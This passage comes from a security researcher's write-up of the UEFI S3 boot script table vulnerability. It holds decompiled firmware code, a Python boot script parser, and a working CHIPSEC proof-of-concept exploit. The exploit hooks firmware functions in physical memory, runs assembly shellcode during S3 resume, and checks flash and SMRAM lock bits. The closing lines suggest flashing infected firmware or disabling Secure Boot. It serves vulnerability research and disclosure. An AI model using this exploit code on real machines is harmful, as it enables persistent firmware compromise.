            // EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
            v10 = BYTE1(v32) & 3;
            InstructionPtr += 24;
            pCpuIo->IoRead8(ppPeiServices, pCpuIo, BYTE1(v32) & 3, HIWORD(v32), 0, 1, &v42);
            v42 = v34 | v42 & v35;
            pCpuIo->IoRead16(ppPeiServices, pCpuIo, v10, HIWORD(v32), 0, 1, &v42);
            continue;

          case 13:

            // vendor-specific opcode?
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
            InstructionPtr += 32;
            LODWORD(v11) = sub_FFBB5DE3(v36, HIDWORD(v36), 10, 0);
            v41 = v11 + 1;
            v49 = 1;
            goto LABEL_78;

          case 2:

            // EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
            v12 = InstructionPtr + 24;
            if ((unsigned __int8)(BYTE1(v32) & 0xFC) == 4)
              v13 = 1;
            else
              v13 = v35;
            v14 = v12;
            InstructionPtr = v13 * (unsigned __int8)(1 << (BYTE1(v32) & 3)) + v12;
            pCpuIo->Io(ppPeiServices, pCpuIo, BYTE1(v32), v34, HIDWORD(v34), v35, v14);
            continue;

          case 3:

            // EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
            v15 = BYTE1(v32) & 3;
            InstructionPtr += 32;
            pCpuIo->Mem(ppPeiServices, pCpuIo, BYTE1(v32) & 3, v34, HIDWORD(v34), 1, &v42);
            v42 = v35 | v42 & v36;
            pCpuIo->Io(ppPeiServices, pCpuIo, v15, v34, HIDWORD(v34), 1, &v42);
            continue;

          case 14:

            // vendor-specific opcode?
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x28u);
            InstructionPtr += 40;
            LODWORD(v16) = sub_FFBB5DE3(v37, v38, 10, 0);
            v41 = v16 + 1;
            v49 = 1;
            goto LABEL_90;

          case 11:

            // EFI_BOOT_SCRIPT_PCI_CONFIG2_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
            InstructionPtr += 32;
            if (v36)
              pPciCfg = (EFI_PEI_PCI_CFG_PPI *)sub_FFBB557D(ppPeiServices, v36);
            if (!pPciCfg)
              goto LABEL_97;
            v49 = 1;
            goto LABEL_28;

          case 4:

LABEL_28:
            // EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE
            if (!v49)
            {              
              ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
              InstructionPtr += 24;
            }
            v44 = BYTE1(v32) & 3;
            v17 = __PAIR__(BYTE1(v32), (unsigned int)v35) & 0xFFFFFFFCFFFFFFFF;
            LOBYTE(v45) = 1 << (BYTE1(v32) & 3);
            v40 = v35;
            v48 = InstructionPtr;
            if ((unsigned __int8)(BYTE1(v32) & 0xFC) == 4)
              LODWORD(v17) = 1;
            v46 = 0;
            v18 = v17 * (unsigned __int8)(1 << (BYTE1(v32) & 3));
            InstructionPtr += v18;
            if (!v35)
              goto LABEL_41;
            break;

          case 12:

            // EFI_BOOT_SCRIPT_PCI_CONFIG2_READ_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x28u);
            InstructionPtr += 40;
            if (v37)
            {
              pPciCfg_ = sub_FFBB557D(ppPeiServices, v37);
              pPciCfg = pPciCfg_;
            }
            else
            {
              pPciCfg_ = pPciCfg;
            }
            if (!pPciCfg_)
              goto LABEL_97;
            v49 = 1;
            goto LABEL_50;

          case 5:

            // EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE
            pPciCfg_ = pPciCfg;
LABEL_50:
            if (!v49)
            {              
              ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
              InstructionPtr += 32;
            }
            v23 = BYTE1(v32) & 3;
            pPciCfg_->Read(ppPeiServices, pPciCfg_, BYTE1(v32) & 3, v34, HIDWORD(v34), &v42);
            v42 = v35 | v42 & v36;
            pPciCfg_->Write(ppPeiServices, pPciCfg_, v23, v34, HIDWORD(v34), &v42);
            if (!v49)
              continue;
            pPeiServices = *ppPeiServices;
            goto LABEL_43;

          case 16:

            // unknown vendor-specific opcode?
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x30u);
            InstructionPtr += 48;
            if (v39)
              pPciCfg = (EFI_PEI_PCI_CFG_PPI *)sub_FFBB557D(ppPeiServices, v39);
            if (!pPciCfg)
              goto LABEL_97;
            v49 = 1;
            goto LABEL_58;

          case 15:

LABEL_58:
            // unknown vendor-specific opcode?
            if (!v49)
            {              
              ParseInstruction(&v32, (const void *)InstructionPtr, 0x28u);
              InstructionPtr += 40;
              v49 = 1;
            }
            LODWORD(v24) = sub_FFBB5DE3(v37, v38, 10, 0);
            v41 = v24 + 1;
            goto LABEL_61;

          case 6:

            // EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x17u);
            v26 = InstructionPtr + 23;
            InstructionPtr += *(_DWORD *)((char *)&v34 + 7) + 23;
            pSmbus2->Execute(
              pSmbus2, *(unsigned int *)((char *)&v32 + 2), v33,
              *(_DWORD *)((char *)&v34 + 2), *(_DWORD *)((char *)&v34 + 6),
              (char *)&v34 + 7, v26
            );
            continue;

          case 7:

            // EFI_BOOT_SCRIPT_STALL_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x10u);
            InstructionPtr += 16;
            pStall->Stall(ppPeiServices, pStall, v34);
            continue;

          case 8:

            // EFI_BOOT_SCRIPT_DISPATCH_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x10u);
            InstructionPtr += 16;
            goto LABEL_73;

          case 9:

            // EFI_BOOT_SCRIPT_MEM_POLL_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
            InstructionPtr += 24;
LABEL_73:
            ((void (__cdecl *)(_DWORD, PVOID *))v34)(0, ppPeiServices);
            continue;

          case 10:

            // EFI_BOOT_SCRIPT_INFORMATION_OPCODE
            InstructionPtr += 16;
            continue;

          default:

            goto LABEL_97;
        }

        while (1)
        {
          pPciCfg->Write(ppPeiServices, pPciCfg, v44, v34, HIDWORD(v34), v48);

          if (!HIDWORD(v17))
            break;

          if (HIDWORD(v17) == 4)
          {
            v48 += v18;
          }
          else
          {
            if (HIDWORD(v17) == 8)
              goto LABEL_39;
          }

LABEL_40:
          ++v46;

          if (v46 >= v40)
          {
LABEL_41:
            if (v49)
            {
              pPeiServices = *ppPeiServices;
              goto LABEL_43;
            }

            goto LABEL_7;
          }
        }

        v48 += v18;

LABEL_39:

        LODWORD(v19) = sub_FFBB5560(v34, HIDWORD(v34), v45);
        v34 = v19;
        goto LABEL_40;
      }

      if (!v49)
      {
        ParseInstruction(&v32, (const void *)InstructionPtr, 0x18u);
        InstructionPtr += 24;
      }

LABEL_78:

      v27 = BYTE1(v32) & 3;

      do
      {
        pCpuIo->IoRead8(ppPeiServices, pCpuIo, v27, HIWORD(v32), 0, 1, &v42);
        v42 &= v34;

        if (v49)
        {
          pStall->Stall(ppPeiServices, pStall, 1);
          v25 = __CFADD__((_DWORD)v41, -1);
          LODWORD(v41) = v41 - 1;
          HIDWORD(v41) = v25 + HIDWORD(v41) - 1;

          if (!v41)
            v42 = v35;
        }
      }
      while (v42 != v35);

LABEL_95:

      v49 = 0;
      continue;
    }

    v28 = Opcode - 0x81;

    if (!v28)
    {
      if (!v49)
      {
        ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
        InstructionPtr += 32;
      }

LABEL_90:

      v31 = BYTE1(v32) & 3;

      do
      {
        pCpuIo->Mem(ppPeiServices, pCpuIo, v31, v34, HIDWORD(v34), 1, &v42);
        v42 &= v35;

        if (v49)
        {
          pStall->Stall(ppPeiServices, pStall, 1);
          v25 = __CFADD__((_DWORD)v41, -1);
          LODWORD(v41) = v41 - 1;
          HIDWORD(v41) = v25 + HIDWORD(v41) - 1;

          if (!v41)
            v42 = v36;
        }
      }
      while (v42 != v36);

      goto LABEL_95;
    }

    v29 = v28 - 1;

    if (v29)
      break;

LABEL_61:

    if (!v49)
    {
      ParseInstruction(&v32, (const void *)InstructionPtr, 0x20u);
      InstructionPtr += 32;
    }

    v44 = BYTE1(v32) & 3;

    do
    {
      pPciCfg->Read(ppPeiServices, pPciCfg, v44, v34, HIDWORD(v34), &v42);
      v42 &= v35;

      if (v49)
      {
        pStall->Stall(ppPeiServices, pStall, 1);
        v25 = __CFADD__((_DWORD)v41, -1);
        LODWORD(v41) = v41 - 1;
        HIDWORD(v41) = v25 + HIDWORD(v41) - 1;

        if (!v41)
          v42 = v36;
      }
    }
    while (v42 != v36);

    if (v49)
    {
      pPeiServices = *ppPeiServices;

LABEL_43:

      pPciCfg__ = (EFI_PEI_PCI_CFG_PPI *)*((_DWORD *)pPeiServices + 25);
      v49 = 0;
      pPciCfg = pPciCfg__;
    }
  }

  v30 = v29 - 1;

  if (!v30)
  {
    InstructionPtr += *(_DWORD *)(InstructionPtr + 4) + 8;
    goto LABEL_7;
  }

  if (v30 == 0x7C)
  {
    result = 0;
  }
  else
  {

LABEL_97:

    result = 0x80000003u;
  }

  return result;
}

Now we can recover the rest part of the boot script table format from the above code and write a basic parser that able to process EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE, EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE, EFI_BOOT_SCRIPT_IO_WRITE_OPCODE and EFI_BOOT_SCRIPT_DISPATCH_OPCODE which is enough to decode the most interesting boot script table entries:
from struct import pack, unpack

def _at(data, off, size, fmt): return unpack(fmt, data[off : off + size])[0]

# helper functions for accessing binary structures data
def byte_at(data, off = 0): return _at(data, off, 1, 'B')
def word_at(data, off = 0): return _at(data, off, 2, 'H')
def dword_at(data, off = 0): return _at(data, off, 4, 'I')
def qword_at(data, off = 0): return _at(data, off, 8, 'Q')

class BootScriptParser(object):

    def __init__(self, quiet = False):

        self.quiet = quiet

    def value_at(self, data, off, width):

        # read boot script value of given type
        if width == self.EfiBootScriptWidthUint8: return byte_at(data, off)
        elif width == self.EfiBootScriptWidthUint16: return word_at(data, off)
        elif width == self.EfiBootScriptWidthUint32: return dword_at(data, off)
        elif width == self.EfiBootScriptWidthUint64: return qword_at(data, off)
        else: raise Exception('Invalid width 0x%x' % width)

    def width_size(self, width):

        # get actual size of the boot script value by size id
        if width == self.EfiBootScriptWidthUint8: return 1
        elif width == self.EfiBootScriptWidthUint16: return 2
        elif width == self.EfiBootScriptWidthUint32: return 4
        elif width == self.EfiBootScriptWidthUint64: return 8
        else: raise Exception('Invalid width 0x%x' % width)

    def log(self, data):

        if not self.quiet: print data

    def process_mem_write(self, width, addr, count, val):

        self.log(('Width: %s, Addr: 0x%.16x, Count: %d\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], addr, count, \
                  ', '.join(map(lambda v: hex(v), val))))

    def process_pci_config_write(self, width, bus, dev, fun, off, count, val):

        self.log(('Width: %s, Count: %d\n' + \
                  'Bus: 0x%.2x, Device: 0x%.2x, Function: 0x%.2x, Offset: 0x%.2x\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], count, bus, dev, fun, off, \
                  ', '.join(map(lambda v: hex(v), val))))

    def process_io_write(self, width, port, count, val):

        self.log(('Width: %s, Port: 0x%.4x, Count: %d\n' + \
                  'Value: %s\n') % \
                 (self.boot_script_width[width], port, count, \
                  ', '.join(map(lambda v: hex(v), val))))

    def process_dispatch(self, addr):

        self.log('Call addr: 0x%.16x' % (addr) + '\n')

    def read_values(self, data, width, count):

        values = []

        for i in range(0, count):

            # read single value of given width
            values.append(self.value_at(data, i * self.width_size(width), width))

        return values

    def parse(self, data, boot_script_addr = 0L):

        ptr = 0
        while data:

            # read boot script table entry header
            num, size, op = unpack('IIB', data[:9])      

            # check for the end of the table
            if op == 0xff:

                self.log('# End of the boot script at offset 0x%x' % ptr)
                break

            elif op >= len(self.boot_script_ops):

                raise Exception('Invalid op 0x%x' % op)

            self.log('#%d len=%d %s' % (num, size, self.boot_script_ops[op]))

            # process known opcodes
            if op == self.EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE:

                # get value information
                width, count = byte_at(data, 9), qword_at(data, 24)

                # get write adderss
                addr = qword_at(data, 16)

                # get values list
                values = self.read_values(data[32:], width, count)
               
                self.process_mem_write(width, addr, count, values)

            elif op == self.EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE:

                # get value information
                width, count = byte_at(data, 9), qword_at(data, 24)

                # get write adderss
                addr = qword_at(data, 16)               

                # get PCI device address
                bus, dev, fun, off = (addr >> 24) & 0xff, (addr >> 16) & 0xff, \
                                     (addr >> 8) & 0xff,  (addr >> 0) & 0xff               

                # get values list
                values = self.read_values(data[32:], width, count)

                self.process_pci_config_write(width, bus, dev, fun, off, count, values)

            elif op == self.EFI_BOOT_SCRIPT_IO_WRITE_OPCODE:

                # get value information
                width, count = byte_at(data, 9), qword_at(data, 16)

                # get I/O port number
                port = word_at(data, 10)

                # get values list
                values = self.read_values(data[24:], width, count)

                self.process_io_write(width, port, count, values)

            elif op == self.EFI_BOOT_SCRIPT_DISPATCH_OPCODE:

                # get call address
                addr = qword_at(data, 16)

                self.process_dispatch(addr)

            else:

                # skip unknown instruction
                pass

            # go to the next instruction
            data = data[size:]
            ptr += size

    EFI_BOOT_SCRIPT_IO_WRITE_OPCODE = 0x00
    EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE = 0x01
    EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE = 0x02
    EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE = 0x03
    EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE = 0x04
    EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE = 0x05
    EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE = 0x06
    EFI_BOOT_SCRIPT_STALL_OPCODE = 0x07
    EFI_BOOT_SCRIPT_DISPATCH_OPCODE = 0x08

    boot_script_ops = [
        'IO_WRITE',
        'IO_READ_WRITE',
        'MEM_WRITE',
        'MEM_READ_WRITE',
        'PCI_CONFIG_WRITE',
        'PCI_CONFIG_READ_WRITE',
        'SMBUS_EXECUTE',
        'STALL',
        'DISPATCH' ]

    EfiBootScriptWidthUint8 = 0
    EfiBootScriptWidthUint16 = 1
    EfiBootScriptWidthUint32 = 2
    EfiBootScriptWidthUint64 = 3
    EfiBootScriptWidthFifoUint8 = 4
    EfiBootScriptWidthFifoUint16 = 5
    EfiBootScriptWidthFifoUint32 = 6
    EfiBootScriptWidthFifoUint64 = 7
    EfiBootScriptWidthFillUint8 = 8
    EfiBootScriptWidthFillUint16 = 9
    EfiBootScriptWidthFillUint32 = 10
    EfiBootScriptWidthFillUint64 = 11

    boot_script_width = [
        'Uint8',
        'Uint16',
        'Uint32',
        'Uint64',
        'FifoUint8',
        'FifoUint16',
        'FifoUint32',
        'FifoUint64',
        'FillUint8',
        'FillUint16',
        'FillUint32',
        'FillUint64' ]

Exploiting vulnerability 


Dumped boot script table has around one thousand entries, here’s a text dump of some from the beginning of the table:
UEFI boot script addr = 0xd5f4c018

#0 len=33 MEM_WRITE
Width: Uint8, Addr: 0x00000000fec00000, Count: 1
Value: 0x0

#1 len=36 MEM_WRITE
Width: Uint32, Addr: 0x00000000fec00004, Count: 1
Value: 0x8000000

#2 len=33 MEM_WRITE
Width: Uint8, Addr: 0x00000000fec00000, Count: 1
Value: 0x10

#3 len=36 MEM_WRITE
Width: Uint32, Addr: 0x00000000fec00004, Count: 1
Value: 0x700

#4 len=36 MEM_WRITE
Width: Uint32, Addr: 0x00000000fed1f404, Count: 1
Value: 0x80

#5 len=40 MEM_READ_WRITE
000000ae: 05 00 00 00 28 00 00 00 03 02 00 00 00 00 00 00 | ................
000000be: 14 90 d1 fe 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000ce: 01 00 00 00 00 00 00 00                         | ........

#6 len=40 MEM_READ_WRITE
000000d6: 06 00 00 00 28 00 00 00 03 00 00 00 00 00 00 00 | ................
000000e6: 04 90 d1 fe 00 00 00 00 01 00 00 00 00 00 00 00 | ................
000000f6: f8 00 00 00 00 00 00 00                         | ........

#7 len=40 MEM_READ_WRITE
000000fe: 07 00 00 00 28 00 00 00 03 02 00 00 00 00 00 00 | ................
0000010e: 20 90 d1 fe 00 00 00 00 02 00 00 01 00 00 00 00 | ................
0000011e: 01 ff ff f8 00 00 00 00                         | ........

#8 len=40 MEM_READ_WRITE
00000126: 08 00 00 00 28 00 00 00 03 02 00 00 00 00 00 00 | ................
00000136: 20 90 d1 fe 00 00 00 00 00 00 00 80 00 00 00 00 | ................
00000146: ff ff ff ff 00 00 00 00                         | ........

#9 len=24 DISPATCH
Call addr: 0x00000000d5ddf260

... around 1000 of other boot script table entries that was skipped,
full dump is here

As you can see, this table has an EFI_BOOT_SCRIPT_DISPATCH_OPCODE entry (#9) that used to call firmware function at address 0xd5ddf260. Original description of the attack supposes insertion of malicious EFI_BOOT_SCRIPT_DISPATCH_OPCODE entry into the table, but in practice, when attacker needs to deal with a lot of different firmware versions from different manufacturers, it might be better to avoid boot script table modification and hook machine code of firmware functions that original boot script calls.

Let’s start to write PoC exploit using Python and CHIPSEC, platform security assessment framework from Intel. Several worlds from it's official description:


CHIPSEC is a framework for analyzing security of PC platforms including hardware, system firmware including BIOS/UEFI and the configuration of platform components. It allows creating security test suite, security assessment tools for various low level components and interfaces as well as forensic capabilities for firmware
CHIPSEC can run on any of these environments:
  • Windows (client and server)
  • Linux
  • UEFI Shell


CHIPSEC already has an excellent set of different tests, they covers almost all known attacks against SMM, Secure Boot, BIOS updates, flash write protection and others. So, I decided to implement my boot script table vulnerability PoC as CHIPSEC module mostly for having a full set of BIOS exploits as one single tool. Of course, it's also possible to implement this exploit in C as standalone Linux kernel module, Windows driver, or something other to your taste.

New module can be created from template:
$ cd chipsec/source/tool/chipsec/modules
$ cp module_template.py boot_script_table.py && vim boot_script_table.py
Module skeleton example:
from chipsec.module_common import *

# import required API
from chipsec.hal.uefi import *
from chipsec.hal.physmem import *

_MODULE_NAME = 'boot_script_table'

class boot_script_table(BaseModule):

    def exploit(self):

        #
        # Main exploit code.
        # Possible return values:
        # - ModuleResult.FAILED - vulnerable
        # - ModuleResult.PASSED - not vulnerable
        # - ModuleResult.ERROR - exploitation error
        #
        # ...
        #

    def is_supported(self):

        # TODO: check for supported hardware and/or OS
        return True

    # --------------------------------------------------------------------------
    # run(module_argv)
    # Required function: run here all tests from this module
    # --------------------------------------------------------------------------
    def run(self, module_argv):

        return self.exploit()

First we need to obtain a boot script table contents:
EFI_VAR_NAME = 'AcpiGlobalVariable'
EFI_VAR_GUID = 'af9ffd67-ec10-488a-9dfc-6cbf5ee22c2e'

def _efi_read_u32(self, name, guid):

    return dword_at(self._uefi.get_EFI_variable(name, guid, None))

def _mem_read(self, addr, size):

    # align memory reads by 1000h
    read_addr = addr & 0xfffffffffffff000
    read_size = size + addr - read_addr

    data = self._memory.read_physical_mem(read_addr, read_size)
    return data[addr - read_addr :]

# read ACPI global variable structure data
AcpiGlobalVariable = self._efi_read_u32(self.EFI_VAR_NAME, self.EFI_VAR_GUID)

# get boot script table address
data = self._mem_read(AcpiGlobalVariable, 0x20)
boot_script_addr = dword_at(data, 0x18)

# read boot script contents
boot_script = self._mem_read(boot_script_addr, 0x8000)

Now let’s use modified version of BootScriptParser class to get a function address from the first EFI_BOOT_SCRIPT_DISPATCH_OPCODE table entry:
class CustomBootScriptParser(BootScriptParser):

    class AddressFound(Exception):

        def __init__(self, addr):

            self.addr = addr
       
    def process_dispatch(self, addr):

        # pass dispatch instruction operand (function address) to the caller
        raise self.AddressFound(addr)

    def parse(self, data, boot_script_addr = 0L):

        try:

            BootScriptParser.parse(self, data, \
                boot_script_addr = boot_script_addr)

        except self.AddressFound as e:

            return e.addr

        # boot script doesn't have any dispatch instructions
        return None

# parse boot script and get address of the native function to hook
func_addr = self.CustomBootScriptParser(quiet = True).parse(boot_script)

Now we need to implement machine code hooking (a classical splicing method), let’s take capstone engine as disassembler library. Also, this function locates unused space at at the end of the code section of executable image to place exploit payload and original function instructions there:
JUMP_32_LEN = 5
JUMP_64_LEN = 14

def _mem_write(self, addr, data):

    self._memory.write_physical_mem(addr, len(data), data)

def _disasm(self, data):

    import capstone

    # get instruction length and mnemonic
    dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32)
    for insn in dis.disasm(data, len(data)):

        return insn.mnemonic + ' ' + insn.op_str, insn.size

def _jump_32(self, src, dst):

    print 'Jump from 0x%x to 0x%x' % (src, dst)

    addr = pack('I', (dst - src - self.JUMP_32_LEN) & 0xffffffff)
    return '\xe9' + addr

def _find_zero_bytes(self, addr, size):

    # search for zero bytes at the end of the code page
    addr = (addr & 0xfffff000) + 0x1000

    while True:
       
        if self._mem_read(addr - size, size) == '\0' * size:

            addr -= size
            break

        addr += 0x1000

    return addr

def _hook(self, addr, payload):

    if self._mem_read(addr, 1) == '\xe9':

        print 'ERROR: Already patched'
        return None

    hook_size = 0

    # read 0x40 bytes of function code
    data = self._mem_read(addr, 0x40)
   
    # disassembly first instructions to determinate patch length
    while hook_size < self.JUMP_32_LEN:

        mnem, size = self._disasm(data[hook_size:])
        hook_size += size
   
    print '%d bytes to patch' % hook_size       

    # backup original instructions that will be replaced by patch
    data = data[:hook_size]

    # find zero memory for payload, original instructions and jump
    buff_size = len(payload) + hook_size + self.JUMP_32_LEN
    buff_addr = self._find_zero_bytes(addr, buff_size)

    print 'Found %d zero bytes at 0x%x' % (buff_size, buff_addr)

    # write payload + original instructions + jump back to hooked function
    buff = payload + data + \
           self._jump_32(buff_addr + len(payload) + hook_size, \
                         addr + hook_size)

    self._mem_write(buff_addr, buff)

    # write 32-bit jump from function to payload
    self._mem_write(addr, self._jump_32(addr, buff_addr))

    return buff_addr, buff_size, data

# compile assembly code of exploit payload
payload = Asm().compile(PAYLOAD)

# set up UEFI function hook that executes our payload
payload_addr, payload_size, old_instructions = self._hook(dispatch_addr, payload)

Now, when code hijacking part is done, let’s write exploit payload that will be compiled by exploit using nasm via simple Python wrapper. Payload collects very basic information about SMM and flash protection during it's execution, this information will be analysed later:
[bits 32]

push    eax                    ; Save original registers values.
push    edx
push    esi

call    _label                 ; Jump to the main payload code.

db      0ffh
dd      0                      ; Shellcode call counter.
db      0                      ; Data area to store BIOS_CNTL value.
dd      0                      ; Data area to store TSEGMB value.

_label:

pop     esi                    ; Get shellcode data area address.
inc     esi
inc     dword [esi]            ; Increment shellcode call counter.

cmp     byte [esi], 1          ; Exit from payload if it was already called.
jne     _end

mov     eax, 0x8000f8dc        ; BIOS_CNTL register is accessible via PCI config space:
mov     dx, 0xcf8              ; bus = 0, dev = 0x1f, func = 0, offset = 0xdc.
out     dx, eax                ; Set up PCI read address.

mov     dx, 0xcfc
in      al, dx                 ; Read BIOS_CNTL value.
mov     byte [esi + 4], al     ; Save BIOS_CNTL value to payload data area.

mov     eax, 0x800000b8        ; TSEGMB is accessible via PCI config space as well:
mov     dx, 0xcf8              ; bus = 0, dev = 0, func = 0, offset = 0xb8.
out     dx, eax                ; Set up PCI read address.

mov     dx, 0xcfc
in      eax, dx                ; Read TSEGMB value.
mov     dword [esi + 5], eax   ; Save TSEGMB value to payload data area.

_end:

pop     esi                    ; End of payload, restore registers values.
pop     edx
pop     eax

;
; Here goes original instructions from the hooked function code 
; and 32-bit jump to function_addr + patch_len.
;

Now we can trigger payload execution using rtcwake command line utility, which available out of the box on most of modern Linux systems. When payload was executed, we need to read it’s data area back from memory and extract recorded BIOS_CNTL and TSEGMB registers values:
# locate payload data area (9 zero bytes)
data_offset = payload.find('\xff' + '\0' * (4 + 1 + 4))

# read payload data area contents from physical memory
data = self._mem_read(payload_addr + data_offset + 1, 4 + 1 + 4)

# parse binary structure
count, BIOS_CNTL, TSEGMB = unpack('=IBI', data)

if count == 0:

    print 'ERROR: shellcode was not executed during S3 resume'
    return ModuleResult.ERROR

According to original paper, BLE bit of BIOS_CNTL is not set during boot script execution as well as lock bit of TSEGMB. Let's implement these checks with obtained values:
# get bit at given position
bitval = lambda val, b: 0L if val & (1L << b) == 0 else 1L
success = True

# check if access to flash is locked with bios lock enable bit of BIOS_CNTL
if bitval(BIOS_CNTL, 1) == 0:

    print '[!] Bios lock enable bit is not set'
    success = False

# check if access to SMRAM via DMA is locked with TSEGMB lock bit
if TSEGMB & 1 == 0:

    print '[!] SMRAM is not locked'
    success = False

return ModuleResult.PASSED if success else ModuleResult.FAILED

Obviously, it will be better to examine platform state during shellcode execution more adequate, there's a lot of other BIOS and SMM security features, not only described two bits. To get complete pwnage of SPI flash for all motherboards that available at the market, we need to defeat another layer in addition to BLE bit: SPI protected ranges. Unfortunately, currently I have problems with reading of SPIBAR contents on my motherboard which is required to get SPI protected ranges information, appropriate module and function from CHIPSEC is also hangs a whole system at this point. From other sources I know, that on my motherboard SPI protected ranges should be properly configured before boot script execution (i.e., flash is secured), but after solving described technical difficulties I still planning to add protected ranges checking functionality to my module. It's also very possible, that SPIBAR access problem is related somehow with two-chip configuration of motherboard (I had seen such boards only several times, and you?).

Starting CHIPSEC with the boot script table PoC module and it's output on my test system:
# python chipsec_main.py --module boot_script_table
[helper] Loaded OS helper: chipsec.helper.linux.helper

################################################################
##                                                            ##
##  CHIPSEC: Platform Hardware Security Assessment Framework  ##
##                                                            ##
################################################################
Version 1.1.3

****** Chipsec Linux Kernel module is licensed under GPL 2.0

[*] loading platform config from '/root/chipsec/source/tool/chipsec/cfg/common.xml'..
[*] loading platform config from '/root/chipsec/source/tool/chipsec/cfg/avn.xml'..

OS      : Linux 3.2.60 #23 SMP Sun Jan 4 03:02:06 EST 2015 x86_64
Platform: Desktop 2nd Generation Core Processor (Sandy Bridge CPU / Cougar Point PCH)
          VID: 8086
          DID: 0100
CHIPSEC : 1.1.3

[+] loaded chipsec.modules.boot_script_table
[*] running loaded modules ..

[*] running module: chipsec.modules.boot_script_table
[*] Module path: /root/chipsec/source/tool/chipsec/modules/boot_script_table.py
[x][ =======================================================================
[x][ Module: UEFI boot script table vulnerability exploit
[x][ =======================================================================
[*] AcpiGlobalVariable = 0xd5f53f18
[*] UEFI boot script addr = 0xd5f4c018
[*] Target function addr = 0xd5ddf260
8 bytes to patch
Found 79 zero bytes at 0xd5deafb1
Jump from 0xd5deaffb to 0xd5ddf268
Jump from 0xd5ddf260 to 0xd5deafb1
Going to S3 sleep for 10 seconds ...
rtcwake: wakeup from "mem" using /dev/rtc0 at Mon Feb  2 08:07:07 2015
[*] BIOS_CNTL = 0x28
[*] TSEGMB = 0xd7000000
[!] Bios lock enable bit is not set
[!] SMRAM is not locked
[!] Your system is VULNERABLE

[CHIPSEC] ***************************  SUMMARY  ***************************
[CHIPSEC] Time elapsed          15.136
[CHIPSEC] Modules total         1
[CHIPSEC] Modules failed to run 0:
[CHIPSEC] Modules passed        0:
[CHIPSEC] Modules failed        1:
[-] FAILED: chipsec.modules.boot_script_table
[CHIPSEC] Modules with warnings 0:
[CHIPSEC] Modules skipped 0:
[CHIPSEC] *****************************************************************
[CHIPSEC] Version:   1.1.3

Full exploit source code is available at GitHub.

To achieve some profit from vulnerability exploitation it's possible to do the following things:

  • If BLE is not set and platform firmware is not using SPI protected ranges or they are not configured yet, attacker can run a shellcode that writes infected firmware image into the flash.
  • If BLE is not set and SPI protected ranges are properly configured at the moment of the boot script table execution, shellcode still can do a lot of evil things with UEFI variables, for example, disable Secure Boot or trigger other firmware vulnerabilities.
  • If TSEGMB is not locked, shellcode can lock it with a random/incorrect address, later attacker can use DMA buffer hijack technique to get r/w access to the SMRAM via DMA and run arbitrary code in SMM (I think it might be a good direction for my further research). This technique was described in "Subverting the Xen hypervisor" talk by Rafal Wojtczuk.